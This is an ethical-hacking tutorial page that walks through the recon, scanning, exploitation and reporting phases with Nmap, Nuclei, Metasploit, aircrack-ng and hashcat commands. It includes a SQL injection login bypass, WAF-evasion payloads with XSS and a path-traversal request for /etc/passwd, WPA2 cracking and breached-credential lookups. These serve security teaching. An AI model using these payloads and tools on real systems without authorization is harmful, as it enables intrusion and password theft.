Ethical Hacking Basics -- Recon, Scanning, Exploitation & Reporting
Ethical hacking is the authorized simulation of cyberattacks to identify vulnerabilities before malicious actors exploit them -- following a structured methodology of reconnaissance, scanning, exploitation, and reporting.
What You'll Learn
You will learn the five phases of ethical hacking, use tools like Nmap and Metasploit for recon and exploitation, and write professional penetration test reports that drive remediation.
Why It Matters
The global cybersecurity workforce faces a 4 million person shortage. Organizations must find vulnerabilities proactively. Ethical hackers earn an average of $120,000 per year and perform critical work protecting infrastructure.
Real-World Use
A penetration tester for a healthcare provider discovers an unauthenticated SQL injection in the patient portal during the scanning phase. The report enables the engineering team to patch before an attacker finds and exploits it.
Phase 1: Reconnaissance
Reconnaissance gathers information about the target without direct interaction.
# Passive recon with Amass
amass enum -d example.com -o recon-results.txt
# Subdomain enumeration
sublist3r -d example.com -o subdomains.txt
# DNS enumeration
dnsrecon -d example.com -t axfr
Expected output: Lists of subdomains, IP addresses, mail servers, and name servers associated with the target domain.
Open Source Intelligence (OSINT) Tools
# Collect email addresses associated with a domain
theHarvester -d example.com -b google,linkedin,bing
# Discover subdomains and related certificates
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u
# Check data breaches for company emails
h8mail -t company.com -bc /path/to/breach-compilation.txt
Expected output: Lists of email addresses, employee names, subdomains, and potentially breached credentials that inform the attack surface.
Phase 2: Scanning
Scanning identifies live hosts, open ports, and running services.
# TCP SYN scan (stealth)
nmap -sS -sV -O -p- --min-rate 5000 -oA nmap-full target.com
# Service and version detection
nmap -sV -p 80,443 --script=http-headers,http-title target.com
Expected output: A complete port inventory with service versions. Open ports 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL) would each indicate different attack surfaces.
# Nmap result example
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu
80/tcp open http nginx 1.24.0
443/tcp open http nginx 1.24.0
3306/tcp open mysql MySQL 8.0.35
Vulnerability Scanning with Nuclei
# Install Nuclei from ProjectDiscovery
nuclei -u https://target.com -t cves/ -t misconfiguration/ -t exposures/
# Scan for specific OWASP Top 10 categories
nuclei -u https://target.com -tags sqli,xss,idor,lfi -severity critical,high
# Export results for reporting
nuclei -u https://target.com -json -o nuclei-results.json
Expected output: Nuclei identifies CVEs matching the target technology stack, misconfigurations like exposed .git directories or default credentials, and information disclosure endpoints.
Phase 3: Enumeration
Enumeration extracts detailed information from discovered services.
# Web directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt
# HTTP header inspection
curl -sI https://target.com | grep -i '\(server\|x-powered-by\|x-frame-options\)'
Expected output: Directory listings, admin panels, backup files, and server header information revealing the technology stack.
Wireless Security Assessment
Testing wireless networks requires specialized tools and techniques.
# Enable monitor mode on wireless interface
airmon-ng start wlan0
# Capture beacon frames and probe requests
airodump-ng wlan0mon
# Crack WPA2 handshake (ethical testing only)
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <bssid> capture-01.cap
Expected behavior: The wireless adapter switches to monitor mode and captures nearby access points and clients. A WPA2 handshake is captured between a client and access point, then cracked offline.
Phase 4: Exploitation
Exploitation attempts to demonstrate impact using discovered vulnerabilities.
# Basic SQL injection test
import requests
payload = "' OR '1'='1"
url = f"https://target.com/login?username=admin&password={payload}"
response = requests.get(url)
if "Welcome" in response.text:
print("SQL injection likely successful")
Expected behavior: If the application returns a success page instead of an error, the login form is vulnerable to SQL injection.
# Metasploit basic usage
msfconsole
search cve:2026 type:exploit
use exploit/multi/http/struts2_content_type
set RHOSTS target.com
set RPORT 8080
check
Expected output: Metasploit confirms the target is vulnerable and provides a check result of "The target appears to be vulnerable."
Web Application Firewall Evasion
Test how WAFs handle common evasion techniques during penetration tests.
# SQL injection with comment obfuscation
curl "https://target.com/search?q=admin'/**/OR/**/1=1--"
# XSS with Unicode encoding
curl "https://target.com/search?q=<sCrIpt>alert(1)</sCrIpT>"
# Path traversal with double encoding
curl "https://target.com/download?file=%252e%252e%252fetc%252fpasswd"
Expected behavior: A well-configured WAF blocks these obfuscated payloads. A misconfigured WAF passes them through, revealing the application is vulnerable despite having a web application firewall.
Password Cracking with Hashcat
When you extract password hashes, Hashcat cracks them using GPU acceleration.
# Identify hash type
hashid -m '$2y$12$T8w2S0YKG0RFF8VxjKFHPO'
# Crack bcrypt hashes with wordlist
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt --show
# Mask attack for 8-character alphanumeric passwords
hashcat -m 1000 ntlm-hashes.txt -a 3 ?a?a?a?a?a?a?a?a --increment
Expected output: Recovered plaintext passwords are displayed with the hash type and cracking speed. Bcrypt (mode 3200) cracks at approximately 200 hashes per second on consumer GPU, while NTLM (mode 1000) cracks at 20 billion hashes per second.
Phase 5: Reporting
Every finding requires clear, actionable documentation.
| Severity | Finding | CVSS | Recommendation |
|---|---|---|---|
| Critical | SQL injection on login endpoint | 9.8 | Parameterize all queries |
| High | SSL certificate expired | 7.5 | Renew and automate renewal |
| Medium | Missing CSP headers | 5.0 | Add Content-Security-Policy |
| Low | Server header discloses version | 2.5 | Hide server version string |
Common Errors
Scanning without authorization -- Running Nmap against a target without written permission is illegal in most jurisdictions. Always obtain a signed scope-of-work document first.
Relying solely on automated tools -- Tools miss business logic flaws like IDOR, race conditions, and privilege escalation. Manual testing is essential.
Skipping the enumeration phase -- Moving directly from scanning to exploitation misses critical context. Enumerate every service -- directory listings, API endpoints, and version-specific CVEs.
Destructive testing in production -- SQL injection can delete tables, and buffer overflows can crash services. Test in staging environments or use safe payloads.
Poor report writing -- Technical findings without business impact or remediation steps get ignored. Write for both the CISO (executive summary) and the developer (technical details).
Practice Questions
What is the difference between active and passive reconnaissance? Passive recon uses public sources like DNS records, search engines, and social media without touching the target. Active recon involves direct interaction like scanning and probing.
Why use a SYN scan (-sS) instead of a full connect scan? SYN scan sends only the first packet of the TCP handshake and never completes it, making it faster and less likely to be logged by applications that log full connections.
What does CVSS score 9.8 indicate? A CVSS of 9.8 is Critical severity -- typically a remotely exploitable vulnerability with no authentication required and high impact on confidentiality, integrity, and availability.
How do you verify a SQL injection is not a false positive? Confirm by extracting actual database information (version, user, database name) through the injection, or by observing different response times in time-based injections.
Challenge: Set up a vulnerable VM (DVWA or Metasploitable), perform a full penetration test through all five phases, and write a professional report with at least five findings including CVSS scores and remediation steps.
Mini Project
Conduct a penetration test against a deliberately vulnerable target like HackTheBox or TryHackMe. Document every step from reconnaissance through exploitation. Write a five-page report with an executive summary, technical findings, CVSS scores, and prioritized remediation recommendations.
Built by the developers of Doda Browser, DodaZIP, and Durga Antivirus Pro.
Built by the developers of DodaTech
Doda Browser, DodaZIP & Durga Antivirus Pro